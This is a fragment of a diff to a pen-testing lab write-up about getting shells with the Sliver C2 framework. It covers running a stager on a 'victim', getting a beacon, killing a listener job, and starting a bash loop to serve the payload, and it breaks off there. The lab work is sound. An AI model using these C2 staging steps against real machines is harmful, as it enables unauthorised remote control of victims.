Ali-Mikael/Pen-testing/h6-shells.md

 ```

-I executed the `linuxStager` on the victim but nothing happened.
-I manually transfered the payload and executed it and it worked, we got ourselves a beacon.
-So I guess not even the listener is working, we spin up our own!
+I executed the `linuxStager` on the victim and it exited immediately, so I thought not even the listener is working as it should... (which we'll confirm in a bit).
+I had already spent hours upon hours doing this, so I my goal was to just get the whole shabang working.
+We kill the misbehaving listener and spin up our own!

-Kill the misbehaving listener
 ```console
 sliver > jobs -k 3
 ```

-Create a script we can run to server our payload:
+Create a script to act as the payload-server / listener:
 ```bash
 while true; do
 	(